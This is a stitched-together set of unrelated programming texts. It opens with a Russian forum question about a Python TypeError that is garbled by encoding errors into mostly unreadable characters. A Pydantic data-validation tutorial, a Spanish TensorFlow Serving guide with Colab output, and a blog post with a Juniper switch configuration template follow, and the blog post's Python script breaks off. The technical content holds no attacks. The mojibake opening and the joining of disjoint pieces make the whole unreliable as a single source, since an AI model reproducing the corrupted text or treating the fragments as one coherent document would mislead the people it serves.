Ркак ÐµÑ Ð¸ÑпÑавиÑÑ ÑÑÐ¾Ð±Ñ ÑезÑлÑÑаÑÑ Ð¼Ð¾Ð³Ð»Ð¸ ÑÐ¾Ñ ÑанÑÑÑÑÑ Ð½Ð¾ÑмалÑно?
P.S.: ÐÑпÑавив stage_preds и Ñделав ее ÑловаÑÑм:
stage_preds = dict()
ÐоÑвлÑеÑÑÑ Ñа же оÑибка но Ñ y_pred[mname]:
Traceback (most recent call last): File "", line 17, in y_pred[mname] = {'X_test': m.predict_proba(X_test)} TypeError: list indices must be integers or slices, not str
ÐÑли ÑÑÑ Ð¿ÐµÑеменнÑÑ Ð·Ð°Ð´Ð°ÑÑ ÐºÐ°Ðº ÑловаÑÑ Ñоже Ñо невозможно бÑÐ´ÐµÑ Ð¿ÑоизвеÑÑи вÑÑиÑÐ»ÐµÐ½Ð¸Ñ ÑÐ¸Ð³Ð¼Ñ (sigmaYpred[mname]) Ñак как пайÑон не бÑÐ´ÐµÑ Ð·Ð½Ð°ÑÑ ÐºÐ°Ðº взаимодейÑÑвоваÑÑ Ñо ÑловаÑÑм и ÑиÑлами.
|
Problem Intro
As a (DS) data Scientist, 80% of our work is dealing with messy data. Our problems are not limited to:
Database id being referenced as _id
Empty values can be referenced as NA, None, "None", "EMPTY"...
Data being passed to you during production requests are wrong
As a DS working with other DS, or as a en engineer working with DS,
Reassigning a variable name multiple times.
Hard to track variables naming convention.
Code are usually contextual heavy (e.g why did the DS divide this number by that aggregation?)
Small Note: pylint/flake8 are also useful to address the above problems.
Pre-req / Setup!
Chop Chop! (Hurry up!)
Code has been prepared for you, just copy and run in your terminal!
You still need check and/or create the appropriate directory though.
Assuming you are using anaconda distribution with mac/linux/docker etc,
conda create -n typedpy python=3.8
conda activate typedpy
pip install -r requirements.txt
Hello World!
Introducing Typed Python! Here is a simple example using native python and the mypy package.
def add(x:int, y:int) -> int:
"""[Simple addition function]
Args:
x ([int]): [An integer]
y ([int]): [An integer]
"""
return x+y
Suppose a DS decides to use this function for another purpose in a python script,
add("hello, ", "how are you")
"""
# output
# hello,how are you'
"""
By using mypy in your terminal where the script exists:
mypy typed_eg1.py
output:
typed_eg1.py:10: error: Argument 1 to "add" has incompatible type "str"; expected "int"
typed_eg1.py:10: error: Argument 2 to "add" has incompatible type "str"; expected "int"
Found 2 errors in 1 file (checked 1 source file)
However, the downside of this is the code still runs, and it does not warn the user of doing something unintended!
Pydantic
Introducing Pydantic!
Everything starts with a BaseModel, like so:
from pydantic import BaseModel
class InputNumbers(BaseModel):
"""
This is where the doc string usually goes
"""
a:int
b:int
mynumbers = InputNumbers(a=10,b=100)
And you can define your function as follows:
def addition(input: InputNumbers) -> int:
return input.a + input.b
input = InputNumbers(a=10,b=100)
input
# InputNumbers(a=10, b=100)
"""
Or you can use dictionary inputs
- useful in handling json requests
"""
input_dict = dict(a=11,b=101)
input2 = InputNumbers(**input_dict)
input2
#InputNumbers(a=11,b=101)
addition(input)
Using the similar example, suppose the user tries to do string addition:
InputNumbers(a='I am so stupid',b=100)
"""
ValidationError: 1 validation error for InputNumbers
a
value is not a valid integer (type=type_error.integer)
"""
Or the user forgets to input certain values:
InputNumbers(a=10) #b is missing
"""
ValidationError: 1 validation error for InputNumbers
b
field required (type=value_error.missing)
"""
Warning! if python allows for the conversion, then pydantic will not warn you. Do note that this behavior is intended!
For example, in python it is acceptable to str(1) or int("1")
class Example(BaseModel):
a: int
b: float
c: int
d: str
input_dict = dict(a=1.1, b=1.2, c='4', d=100)
Example(**input_dict)
"""
Example(a=1, b=1.2, c=4, d='100')
"""
Autocomplete
Because we are using python classes and declaring types in the functions, it enables auto complete when developing the functions, speeding up your workflow!
If you are using IDE,
Outputs
You can also define outputs with pydantic:
from pydantic import BaseModel
class ExampleIn(BaseModel):
a: int
b: int
class ExampleOut(BaseModel):
addition: int
multiplication: int
division: float
def compute_features(input: ExampleIn) -> ExampleOut:
add: int = input.a + input.b
multi: int = input.a * input.b
div: float = input.a / input.b
return ExampleOut(addition=add, multiplication=multi, division=div)
In = ExampleIn(a=10,b=100)
compute_features(In)
"""
ExampleOut(addition=110, multiplication=1000, division=0.1)
"""
Types
The full list of types available can be found in the docs, I will go through the most commonly used in my experience.
We will be making use of the Typing library for certain cases. The reason will be explained further below.
Default Values
from pydantic import BaseModel
from typing import Optional
class Example(BaseModel):
required: int #no value specified
default_val: str = 10
optional_val: Optional[int]
Example(required=1)
# Example(required=1, default_val=10, optional_val=None)
Example(required=2,default_val=10)
# Example(required=2, default_val='10', optional_val=None)
Optional Values
from pydantic import BaseModel
from typing import Optional
class Example(BaseModel):
required: int #no value specified
default_val: str = 10
optional_val: Optional[int]
Example(required=3,default_val=20,optional_val=100 )
# Example(required=3, default_val='20', optional_val=100)
Union
from pydantic import BaseModel
from typing import Optional
class Example(BaseModel):
required: int #no value specified
default_val: str = 10
optional_val: Union[int,None]
optiona_val2: Union[int,str,float]
Aside: Optional is actually Union[..., None]
List, Dict, Any
What if you want to use certain python structures?
Unsure of what data type to use?
from typing import List, Dict, Any
# This will throw an error
var: list[float]
# this will not:
var: List[float]
var2: Dict[str, float]
var3: List[Any]
Enum / IntEnum
You use Enum generally when you want a variable to take in a set of categorical values.
from enum import Enum, IntEnum
class Animal(str,Enum):
DOG: str = 'DOG'
CAT: str = 'CAT'
class Action(int,Enum):
JUMP = 1
SIT = 2
LIEDOWN = 3
PAW = 4
You can use these classes as follows:
Animal.DOG
Animal.DOG.value
Animal["DOG"].value
Complex Models
You can then define models/classes like this:
from typing import List, Dict, Set
from pydantic import BaseModel
from enum import Enum, IntEnum
class Animal(str, Enum):
DOG: str = "DOG"
CAT: str = "CAT"
class Action(IntEnum):
JUMP = 1
SIT = 2
LIEDOWN = 3
PAW = 4
class Pet(BaseModel):
category: Animal
tricks: List[Action]
class Attributes(BaseModel):
age: int
country: str
class House(BaseModel):
Pets: List[Pet]
attributes: Attributes
pet1 = Pet(category=Animal.DOG, tricks=[Action.JUMP, Action.SIT])
pet2 = Pet(category=Animal.CAT, tricks=[Action.LIEDOWN, Action.PAW])
House(Pets=[pet1, pet2], attributes=dict(age=10, country="Singapore"))
"""
House(Pets=[Pet(category=<Animal.DOG: 'DOG'>,
tricks=[<Action.JUMP: 1>, <Action.SIT: 2>]),
Pet(category=<Animal.CAT: 'CAT'>, tricks=[<Action.LIEDOWN: 3>,
<Action.PAW: 4>])], attributes=Attributes(age=10, country='Singapore'))
"""
Validators
This section is largely similar to the docs here and the documentation is pretty good.
Instead, i will highlight some specific notes/details that is tend to be overlooked.
In summary, this is what a typical validator looks like:
from pydantic import BaseModel, validator
from datetime import datetime
from time import time
class Account(BaseModel):
account_id: int
date_join: datetime
@validator("date_join")
def time_must_be_before_today(cls, v):
if v > datetime.now():
raise ValueError("Are you from the future?")
return v
Account(account_id=123, date_join=datetime(3000, 12, 1))
"""
ValidationError: 1 validation error for Account
date_join
Are you from the future? (type=value_error)
"""
The way to go about understanding the validator declarator, is that it is a class method, and v represents the attribute date_join as specified above.
Also, at the validator, you can choose to edit the variable.
Example:
class Example(BaseModel):
even_num: int
@validator('even_num')
def make_it_even(cls,v):
if v % 2 == 0:
return v
else:
return v+1
Example(even_num=51)
"""
Example(even_num=52)
"""
Handling messy data
Now, suppose your upstream has messy data values, rather than defining a function,you can just let pydantic do the job for you.
class CleanData(BaseModel):
value: str
@validator("value")
def change_all(cls,v):
if v in ["empty","NA","NONE","EMPTY","INVALID"]:
v = "not supplied"
return v
This also allows for cleaner scripts and faster workflow. It also isolates the data cleaning in each step of the process.
Exporting
Sometimes you are expected to return the data in json format, and certain data types in python is not supported natively.
For example:
import json
json.dumps(set([1,2,3]))
"""
TypeError: Object of type set is not JSON serializable
"""
class SpecialSet(BaseModel):
myset: set
example = SpecialSet(myset=set([1,2,3]))
example.json()
"""
'{"myset": [1, 2, 3]}'
"""
If you are returning in dictionary, with the earlier example:
house = House(Pets=[pet1, pet2], attributes=dict(age=10, country="Singapore"))
house.dict()
"""
house.dict()
{'Pets': [{'category': <Animal.DOG: 'DOG'>,
'tricks': [<Action.JUMP: 1>, <Action.SIT: 2>]},
{'category': <Animal.CAT: 'CAT'>,
'tricks': [<Action.LIEDOWN: 3>, <Action.PAW: 4>]}],
'attributes': {'age': 10, 'country': 'Singapore'}}
"""
house.json()
"""
'{"Pets": [{"category": "DOG", "tricks": [1, 2]}, {"category": "CAT", "tricks": [3, 4]}], "attributes": {"age": 10, "country": "Singapore"}}'
"""
Note: full docs found here. It is worth while taking a look and understand the other methods available, specifically the exclude/include methods.
Using Fields
Sometimes, your upstream / downstream:
reference a schema with a different name,
or is prone to schema changes,
or has a different perspective of CamelCase or snake_case.
This is where Field customisation becomes very useful.
Here are two examples:
Alias
from pydantic import BaseModel, Field
class Example(BaseModel):
booking_id: int = Field(..., alias="_id", description="This is the booking_id")
example = Example(_id=123)
"""
Example(booking_id=123)
"""
example.json()
"""
'{"booking_id": 123}'
"""
example.json(by_alias=True)
"""
'{"_id": 123}'
"""
By using alias, you are able have cleaner code as your application code will be independent of your inputs/outputs as per your requirements docs.
Alias Generators
Suppose you prefer snake_case, but your upstream sends in CamelCase,
from pydantic import BaseModel
def to_camel(string: str) -> str:
return ''.join(word.capitalize() for word in string.split('_'))
class Example(BaseModel):
i_love_camel_case: str
yes_i_really_do: str
class Config:
alias_generator = to_camel
eg = Example(ILoveCamelCase = "TRUE", YesIReallyDo ="YES, REALLY")
https://pydantic-docs.helpmanual.io/usage/model_config/#alias-generator
Summary
We have seen that with pydantic classes:
How you can code your application logic that is independent of your upstream/downstream by using alias.
Different values can be imputed or values can be checked with validators
variables can also be adjusted within the pydantic class
Validating data types are correct before proceeding
Objects are clean with clear attributes, being functions being statically typed with 0 ambiguous inputs and outputs. This will also make testing easier.
Objects can be documented (versus typical code blocks that is usually done as an after thought) with the help of class doc strings and Fields descriptions.
Additional Readings
The below readings are useful / helped to better appreciate static typing. I recommend you to read them, first by skimming and then in details!
Alternative guide by fastapi
Real python - why should you care about type hints?
Python type checking - guide
Introduction to pep8
|
Esta guía entrena un modelo de red neuronal para clasificar imágenes de ropa, como zapatillas y camisetas , guarda el modelo entrenado y luego lo muestra con TensorFlow Serving . La atención se centra en TensorFlow Serving, en lugar del modelado y el entrenamiento en TensorFlow, por lo que para obtener un ejemplo completo que se centra en el modelado y el entrenamiento, consulte el ejemplo de Clasificación básica .
Esta guía usa tf.keras , una API de alto nivel para crear y entrenar modelos en TensorFlow.
import sys
# Confirm that we're using Python 3
assert sys.version_info.major is 3, 'Oops, not running Python 3. Use Runtime > Change runtime type'
# TensorFlow and tf.keras
print("Installing dependencies for Colab environment")
!pip install -Uq grpcio==1.26.0
import tensorflow as tf
from tensorflow import keras
# Helper libraries
import numpy as np
import matplotlib.pyplot as plt
import os
import subprocess
print('TensorFlow version: {}'.format(tf.__version__))
Installing dependencies for Colab environment [K |████████████████████████████████| 2.4MB 4.6MB/s [?25hInstalling TensorFlow TensorFlow 2.x selected. TensorFlow version: 2.1.0-rc1
Crea tu modelo
Importar el conjunto de datos Fashion MNIST
Esta guía utiliza el conjunto de datos Fashion MNIST que contiene 70.000 imágenes en escala de grises en 10 categorías. Las imágenes muestran prendas de vestir individuales a baja resolución (28 por 28 píxeles), como se ve aquí:
Figura 1. Muestras de moda-MNIST (por Zalando, licencia del MIT).
Fashion MNIST está pensado como un reemplazo directo del clásico conjunto de datos MNIST , que a menudo se usa como el "Hola, mundo" de los programas de aprendizaje automático para la visión por computadora. Puede acceder a Fashion MNIST directamente desde TensorFlow, solo importe y cargue los datos.
fashion_mnist = keras.datasets.fashion_mnist
(train_images, train_labels), (test_images, test_labels) = fashion_mnist.load_data()
# scale the values to 0.0 to 1.0
train_images = train_images / 255.0
test_images = test_images / 255.0
# reshape for feeding into the model
train_images = train_images.reshape(train_images.shape[0], 28, 28, 1)
test_images = test_images.reshape(test_images.shape[0], 28, 28, 1)
class_names = ['T-shirt/top', 'Trouser', 'Pullover', 'Dress', 'Coat',
'Sandal', 'Shirt', 'Sneaker', 'Bag', 'Ankle boot']
print('\ntrain_images.shape: {}, of {}'.format(train_images.shape, train_images.dtype))
print('test_images.shape: {}, of {}'.format(test_images.shape, test_images.dtype))
Downloading data from https://storage.googleapis.com/tensorflow/tf-keras-datasets/train-labels-idx1-ubyte.gz 32768/29515 [=================================] - 0s 0us/step Downloading data from https://storage.googleapis.com/tensorflow/tf-keras-datasets/train-images-idx3-ubyte.gz 26427392/26421880 [==============================] - 0s 0us/step Downloading data from https://storage.googleapis.com/tensorflow/tf-keras-datasets/t10k-labels-idx1-ubyte.gz 8192/5148 [===============================================] - 0s 0us/step Downloading data from https://storage.googleapis.com/tensorflow/tf-keras-datasets/t10k-images-idx3-ubyte.gz 4423680/4422102 [==============================] - 0s 0us/step train_images.shape: (60000, 28, 28, 1), of float64 test_images.shape: (10000, 28, 28, 1), of float64
Entrena y evalúa tu modelo
Usemos la CNN más simple posible, ya que no estamos enfocados en la parte del modelado.
model = keras.Sequential([
keras.layers.Conv2D(input_shape=(28,28,1), filters=8, kernel_size=3,
strides=2, activation='relu', name='Conv1'),
keras.layers.Flatten(),
keras.layers.Dense(10, activation=tf.nn.softmax, name='Softmax')
])
model.summary()
testing = False
epochs = 5
model.compile(optimizer='adam',
loss='sparse_categorical_crossentropy',
metrics=['accuracy'])
model.fit(train_images, train_labels, epochs=epochs)
test_loss, test_acc = model.evaluate(test_images, test_labels)
print('\nTest accuracy: {}'.format(test_acc))
Model: "sequential" _________________________________________________________________ Layer (type) Output Shape Param # ================================================================= Conv1 (Conv2D) (None, 13, 13, 8) 80 _________________________________________________________________ flatten (Flatten) (None, 1352) 0 _________________________________________________________________ Softmax (Dense) (None, 10) 13530 ================================================================= Total params: 13,610 Trainable params: 13,610 Non-trainable params: 0 _________________________________________________________________ Train on 60000 samples Epoch 1/5 60000/60000 [==============================] - 11s 185us/sample - loss: 0.5466 - accuracy: 0.8087 Epoch 2/5 60000/60000 [==============================] - 5s 79us/sample - loss: 0.4032 - accuracy: 0.8580 Epoch 3/5 60000/60000 [==============================] - 5s 76us/sample - loss: 0.3613 - accuracy: 0.8712 Epoch 4/5 60000/60000 [==============================] - 5s 75us/sample - loss: 0.3406 - accuracy: 0.8797 Epoch 5/5 60000/60000 [==============================] - 4s 75us/sample - loss: 0.3247 - accuracy: 0.8848 10000/10000 [==============================] - 1s 73us/sample - loss: 0.3510 - accuracy: 0.8747 Test accuracy: 0.8747000098228455
Guarda tu modelo
Para cargar nuestro modelo entrenado en TensorFlow Serving, primero debemos guardarlo en formato SavedModel . Esto creará un archivo protobuf en una jerarquía de directorios bien definida e incluirá un número de versión. TensorFlow Serving nos permite seleccionar qué versión de un modelo o "servible" queremos usar cuando hacemos solicitudes de inferencia. Cada versión se exportará a un subdirectorio diferente en la ruta indicada.
# Fetch the Keras session and save the model
# The signature definition is defined by the input and output tensors,
# and stored with the default serving key
import tempfile
MODEL_DIR = tempfile.gettempdir()
version = 1
export_path = os.path.join(MODEL_DIR, str(version))
print('export_path = {}\n'.format(export_path))
tf.keras.models.save_model(
model,
export_path,
overwrite=True,
include_optimizer=True,
save_format=None,
signatures=None,
options=None
)
print('\nSaved model:')
!ls -l {export_path}
export_path = /tmp/1 Warning:tensorflow:From /tensorflow-2.1.0/python3.6/tensorflow_core/python/ops/resource_variable_ops.py:1786: calling BaseResourceVariable.__init__ (from tensorflow.python.ops.resource_variable_ops) with constraint is deprecated and will be removed in a future version. Instructions for updating: If using Keras pass *_constraint arguments to layers. INFO:tensorflow:Assets written to: /tmp/1/assets Saved model: total 84 drwxr-xr-x 2 root root 4096 Jan 7 23:15 assets -rw-r--r-- 1 root root 74086 Jan 7 23:15 saved_model.pb drwxr-xr-x 2 root root 4096 Jan 7 23:15 variables
Examina tu modelo guardado
Usaremos la utilidad de línea de comando saved_model_cli para ver MetaGraphDefs (los modelos) y SignatureDefs (los métodos que puede llamar) en nuestro SavedModel. Consulta esta discusión sobre la CLI del modelo guardado en la Guía de TensorFlow.
saved_model_cli show --dir {export_path} --all
MetaGraphDef with tag-set: 'serve' contains the following SignatureDefs: signature_def['__saved_model_init_op']: The given SavedModel SignatureDef contains the following input(s): The given SavedModel SignatureDef contains the following output(s): outputs['__saved_model_init_op'] tensor_info: dtype: DT_INVALID shape: unknown_rank name: NoOp Method name is: signature_def['serving_default']: The given SavedModel SignatureDef contains the following input(s): inputs['Conv1_input'] tensor_info: dtype: DT_FLOAT shape: (-1, 28, 28, 1) name: serving_default_Conv1_input:0 The given SavedModel SignatureDef contains the following output(s): outputs['Softmax'] tensor_info: dtype: DT_FLOAT shape: (-1, 10) name: StatefulPartitionedCall:0 Method name is: tensorflow/serving/predict WARNING:tensorflow:From /tensorflow-2.1.0/python3.6/tensorflow_core/python/ops/resource_variable_ops.py:1786: calling BaseResourceVariable.__init__ (from tensorflow.python.ops.resource_variable_ops) with constraint is deprecated and will be removed in a future version. Instructions for updating: If using Keras pass *_constraint arguments to layers. Defined Functions: Function Name: '__call__' Option #1 Callable with: Argument #1 Conv1_input: TensorSpec(shape=(None, 28, 28, 1), dtype=tf.float32, name='Conv1_input') Argument #2 DType: bool Value: True Argument #3 DType: NoneType Value: None Option #2 Callable with: Argument #1 inputs: TensorSpec(shape=(None, 28, 28, 1), dtype=tf.float32, name='inputs') Argument #2 DType: bool Value: True Argument #3 DType: NoneType Value: None Option #3 Callable with: Argument #1 inputs: TensorSpec(shape=(None, 28, 28, 1), dtype=tf.float32, name='inputs') Argument #2 DType: bool Value: False Argument #3 DType: NoneType Value: None Option #4 Callable with: Argument #1 Conv1_input: TensorSpec(shape=(None, 28, 28, 1), dtype=tf.float32, name='Conv1_input') Argument #2 DType: bool Value: False Argument #3 DType: NoneType Value: None Function Name: '_default_save_signature' Option #1 Callable with: Argument #1 Conv1_input: TensorSpec(shape=(None, 28, 28, 1), dtype=tf.float32, name='Conv1_input') Function Name: 'call_and_return_all_conditional_losses' Option #1 Callable with: Argument #1 inputs: TensorSpec(shape=(None, 28, 28, 1), dtype=tf.float32, name='inputs') Argument #2 DType: bool Value: True Argument #3 DType: NoneType Value: None Option #2 Callable with: Argument #1 inputs: TensorSpec(shape=(None, 28, 28, 1), dtype=tf.float32, name='inputs') Argument #2 DType: bool Value: False Argument #3 DType: NoneType Value: None Option #3 Callable with: Argument #1 Conv1_input: TensorSpec(shape=(None, 28, 28, 1), dtype=tf.float32, name='Conv1_input') Argument #2 DType: bool Value: False Argument #3 DType: NoneType Value: None Option #4 Callable with: Argument #1 Conv1_input: TensorSpec(shape=(None, 28, 28, 1), dtype=tf.float32, name='Conv1_input') Argument #2 DType: bool Value: True Argument #3 DType: NoneType Value: None
¡Eso nos dice mucho sobre nuestro modelo! En este caso, acabamos de entrenar nuestro modelo, por lo que ya conocemos las entradas y salidas, pero si no lo hiciéramos, esta sería información importante. No nos dice todo, como el hecho de que se trata de datos de imagen en escala de grises, por ejemplo, pero es un gran comienzo.
Sirva su modelo con TensorFlow Serving
Agrega el URI de distribución de TensorFlow Serving como fuente del paquete:
Nos estamos preparando para instalar TensorFlow Serving con Aptitude, ya que este Colab se ejecuta en un entorno Debian. tensorflow-model-server el tensorflow-model-server a la lista de paquetes que conoce Aptitude. Tenga en cuenta que estamos ejecutando como root.
# This is the same as you would do from your command line, but without the [arch=amd64], and no sudo
# You would instead do:
# echo "deb [arch=amd64] http://storage.googleapis.com/tensorflow-serving-apt stable tensorflow-model-server tensorflow-model-server-universal" | sudo tee /etc/apt/sources.list.d/tensorflow-serving.list && \
# curl https://storage.googleapis.com/tensorflow-serving-apt/tensorflow-serving.release.pub.gpg | sudo apt-key add -
!echo "deb http://storage.googleapis.com/tensorflow-serving-apt stable tensorflow-model-server tensorflow-model-server-universal" | tee /etc/apt/sources.list.d/tensorflow-serving.list && \
curl https://storage.googleapis.com/tensorflow-serving-apt/tensorflow-serving.release.pub.gpg | apt-key add -
!apt update
deb http://storage.googleapis.com/tensorflow-serving-apt stable tensorflow-model-server tensorflow-model-server-universal % Total % Received % Xferd Average Speed Time Time Time Current Dload Upload Total Spent Left Speed 100 2943 100 2943 0 0 11496 0 --:--:-- --:--:-- --:--:-- 11496 OK Get:1 http://storage.googleapis.com/tensorflow-serving-apt stable InRelease [3,012 B] Get:2 https://cloud.r-project.org/bin/linux/ubuntu bionic-cran35/ InRelease [3,626 B] Ign:3 https://developer.download.nvidia.com/compute/cuda/repos/ubuntu1804/x86_64 InRelease Ign:4 https://developer.download.nvidia.com/compute/machine-learning/repos/ubuntu1804/x86_64 InRelease Hit:5 https://developer.download.nvidia.com/compute/cuda/repos/ubuntu1804/x86_64 Release Get:6 https://developer.download.nvidia.com/compute/machine-learning/repos/ubuntu1804/x86_64 Release [564 B] Get:7 https://developer.download.nvidia.com/compute/machine-learning/repos/ubuntu1804/x86_64 Release.gpg [833 B] Hit:8 http://ppa.launchpad.net/graphics-drivers/ppa/ubuntu bionic InRelease Hit:9 http://archive.ubuntu.com/ubuntu bionic InRelease Get:10 http://security.ubuntu.com/ubuntu bionic-security InRelease [88.7 kB] Get:11 http://storage.googleapis.com/tensorflow-serving-apt stable/tensorflow-model-server amd64 Packages [354 B] Get:12 https://cloud.r-project.org/bin/linux/ubuntu bionic-cran35/ Packages [81.6 kB] Get:13 http://archive.ubuntu.com/ubuntu bionic-updates InRelease [88.7 kB] Get:14 http://storage.googleapis.com/tensorflow-serving-apt stable/tensorflow-model-server-universal amd64 Packages [364 B] Get:15 http://ppa.launchpad.net/marutter/c2d4u3.5/ubuntu bionic InRelease [15.4 kB] Get:17 https://developer.download.nvidia.com/compute/machine-learning/repos/ubuntu1804/x86_64 Packages [30.4 kB] Get:18 http://archive.ubuntu.com/ubuntu bionic-backports InRelease [74.6 kB] Get:19 http://ppa.launchpad.net/marutter/c2d4u3.5/ubuntu bionic/main Sources [1,749 kB] Get:20 http://security.ubuntu.com/ubuntu bionic-security/universe amd64 Packages [796 kB] Get:21 http://archive.ubuntu.com/ubuntu bionic-updates/main amd64 Packages [1,073 kB] Get:22 http://security.ubuntu.com/ubuntu bionic-security/main amd64 Packages [776 kB] Get:23 http://security.ubuntu.com/ubuntu bionic-security/restricted amd64 Packages [21.3 kB] Get:24 http://archive.ubuntu.com/ubuntu bionic-updates/multiverse amd64 Packages [10.8 kB] Get:25 http://archive.ubuntu.com/ubuntu bionic-updates/universe amd64 Packages [1,324 kB] Get:26 http://archive.ubuntu.com/ubuntu bionic-updates/restricted amd64 Packages [35.5 kB] Get:27 http://ppa.launchpad.net/marutter/c2d4u3.5/ubuntu bionic/main amd64 Packages [844 kB] Fetched 7,019 kB in 4s (1,913 kB/s) Reading package lists... Done Building dependency tree Reading state information... Done 21 packages can be upgraded. Run 'apt list --upgradable' to see them.
Instalar TensorFlow Serving
Esto es todo lo que necesita: ¡una línea de comando!
apt-get install tensorflow-model-server
Reading package lists... Done Building dependency tree Reading state information... Done The following package was automatically installed and is no longer required: libnvidia-common-430 Use 'apt autoremove' to remove it. The following NEW packages will be installed: tensorflow-model-server 0 upgraded, 1 newly installed, 0 to remove and 21 not upgraded. Need to get 140 MB of archives. After this operation, 0 B of additional disk space will be used. Get:1 http://storage.googleapis.com/tensorflow-serving-apt stable/tensorflow-model-server amd64 tensorflow-model-server all 2.0.0 [140 MB] Fetched 140 MB in 2s (78.8 MB/s) Selecting previously unselected package tensorflow-model-server. (Reading database ... 145674 files and directories currently installed.) Preparing to unpack .../tensorflow-model-server_2.0.0_all.deb ... Unpacking tensorflow-model-server (2.0.0) ... Setting up tensorflow-model-server (2.0.0) ...
Comience a ejecutar TensorFlow Serving
Aquí es donde comenzamos a ejecutar TensorFlow Serving y cargamos nuestro modelo. Después de que se cargue, podemos comenzar a realizar solicitudes de inferencia usando REST. Hay algunos parámetros importantes:
rest_api_port: el puerto que usará para las solicitudes REST.
model_name: lo usará en la URL de las solicitudes REST. Puede ser cualquier cosa.
model_base_path: esta es la ruta al directorio donde ha guardado su modelo.
os.environ["MODEL_DIR"] = MODEL_DIR
nohup tensorflow_model_server \
--rest_api_port=8501 \
--model_name=fashion_model \
--model_base_path="${MODEL_DIR}" >server.log 2>&1
Starting job # 0 in a separate thread.
tail server.log
[warn] getaddrinfo: address family for nodename not supported [evhttp_server.cc : 238] NET_LOG: Entering the event loop ...
Realiza una solicitud a tu modelo en TensorFlow Serving
Primero, echemos un vistazo a un ejemplo aleatorio de nuestros datos de prueba.
def show(idx, title):
plt.figure()
plt.imshow(test_images[idx].reshape(28,28))
plt.axis('off')
plt.title('\n\n{}'.format(title), fontdict={'size': 16})
import random
rando = random.randint(0,len(test_images)-1)
show(rando, 'An Example Image: {}'.format(class_names[test_labels[rando]]))
Ok, eso parece interesante. ¿Qué tan difícil es para ti reconocerlo? Ahora creemos el objeto JSON para un lote de tres solicitudes de inferencia y veamos qué tan bien reconoce nuestro modelo las cosas:
import json
data = json.dumps({"signature_name": "serving_default", "instances": test_images[0:3].tolist()})
print('Data: {} ... {}'.format(data[:50], data[len(data)-52:]))
Data: {"signature_name": "serving_default", "instances": ... [0.0], [0.0], [0.0], [0.0], [0.0], [0.0], [0.0]]]]}
Realizar solicitudes de REST
Versión más nueva del servidor
Enviaremos una solicitud de predicción como POST al punto final REST de nuestro servidor y le pasaremos tres ejemplos. Le pediremos a nuestro servidor que nos proporcione la última versión de nuestro servidor sin especificar una versión en particular.
!pip install -q requests
import requests
headers = {"content-type": "application/json"}
json_response = requests.post('http://localhost:8501/v1/models/fashion_model:predict', data=data, headers=headers)
predictions = json.loads(json_response.text)['predictions']
show(0, 'The model thought this was a {} (class {}), and it was actually a {} (class {})'.format(
class_names[np.argmax(predictions[0])], np.argmax(predictions[0]), class_names[test_labels[0]], test_labels[0]))
Una versión particular del servidor
Ahora especifiquemos una versión particular de nuestro servidor. Como solo tenemos uno, seleccionemos la versión 1. También veremos los tres resultados.
headers = {"content-type": "application/json"}
json_response = requests.post('http://localhost:8501/v1/models/fashion_model/versions/1:predict', data=data, headers=headers)
predictions = json.loads(json_response.text)['predictions']
for i in range(0,3):
show(i, 'The model thought this was a {} (class {}), and it was actually a {} (class {})'.format(
class_names[np.argmax(predictions[i])], np.argmax(predictions[i]), class_names[test_labels[i]], test_labels[i]))
|
One of the first things that I’d like to highlight that has helped me in my role as a network engineer is utilizing python to create uniform network configurations for branch sites. Essentially I just use a “cookie cutter” device template that I’ve replaced the site specific details with variables. Then I use a python script that goes through and automatically builds out the configuration for the device. From here the programming could easily be configured to build the configuration for the routers, populate the network monitoring system with the new devices, and even push the configuration out to the devices automatically. I wanted to keep this post bite size and show that python doesn’t need to be connected to the devices directly to be highly useful.
There’s a few things to note here before we get started:
These examples are created for Juniper EX4300 switches, though can easily be repurposed for any other model or vendor of network equipment.
The python script was made using python3.7 and doesn’t work on earlier versions.
The device template is assuming an IP scheme using /16 subnets to differentiate between locations.
The first step is to build out a device template configuration and then replace the site specific information with variables.
In this example you can see how I’ve created the variables at the top for location, host name, and site specific IP information. I then also added comments in the configuration that I use as a variable only when more than two switches are required for the site (if not used they are simply ignored as comments).
#Switch Template
#
#Replace following variables with site specific info:
#
#Description of Item - [variable name]
#hostname - [hostname]
#Branch number - [xx]
#City Name - [name]
#City-State - [location]
#Switch 01 Serial Number - [serial_1]
#Switch 02 Serial Number - [serial_2]
#Port configuration if more than 2 switches - /*additional_swch_ports*/
#Virtual Chassis configuration if more than two switches - /*additional_swch_vr_chas*/
#
# Load the following configuration on the switch core
set system host-name [hostname]
set system services dhcp-local-server group server1 interface irb.1
set system services dhcp-local-server group server2 interface irb.2
set system commit synchronize
set chassis redundancy graceful-switchover
set chassis alarm management-ethernet link-down ignore
set interfaces interface-range access_ports member-range ge-0/0/1 to ge-0/0/47
set interfaces interface-range access_ports member-range ge-1/0/0 to ge-1/0/47
/*additional_swch_ports*/
set interfaces interface-range access_ports unit 0 family ethernet-switching interface-mode access
set interfaces interface-range access_ports unit 0 family ethernet-switching vlan members vlan1
set interfaces ge-0/0/0 description "Uplink to RTR01"
set interfaces ge-0/0/0 unit 0 family inet address 10.[xx].3.1/24
set interfaces irb unit 1 description "Data Network"
set interfaces irb unit 1 family inet address 10.[xx].1.1/24
set interfaces irb unit 2 description "Voice Network"
set interfaces irb unit 2 family inet address 10.[xx].2.1/24
set interfaces lo0 unit 0 family inet address 10.[xx].255.3/32
set snmp location "[location]"
set routing-options nonstop-routing
set protocols ospf area 0.0.0.0 interface ge-0/0/0.0
set protocols ospf area 0.0.0.0 interface lo0.0 passive
set protocols ospf area 0.0.0.0 interface irb.1 passive
set protocols ospf area 0.0.0.0 interface irb.2 passive
set access address-assignment pool pool1 family inet network 10.[xx].1.0/24
set access address-assignment pool pool1 family inet range range1 low 10.[xx].1.20
set access address-assignment pool pool1 family inet range range1 high 10.[xx].1.200
set access address-assignment pool pool2 family inet network 10.[xx].2.0/24
set access address-assignment pool pool2 family inet range range1 low 10.[xx].2.20
set access address-assignment pool pool2 family inet range range1 high 10.[xx].2.200
set switch-options voip interface access_ports vlan vlan2
set switch-options voip interface access_ports forwarding-class expedited-forwarding
set virtual-chassis preprovisioned
set virtual-chassis member 0 role routing-engine
set virtual-chassis member 0 serial-number [serial_1]
set virtual-chassis member 1 role routing-engine
set virtual-chassis member 1 serial-number [serial_2]
/*additional_swch_vr_chas*/
set vlans vlan1 description "Data Vlan"
set vlans vlan1 vlan-id 1
set vlans vlan1 l3-interface irb.1
set vlans vlan2 description "Voice Vlan"
set vlans vlan2 vlan-id 2
set vlans vlan2 l3-interface irb.2
The second step is to build out a python script to match and replace the variables in the switch template.
Import switch_template file
t = open(r"switch_template.txt", "r")
tempstr = t.read()
t.close()
Ask user for site information
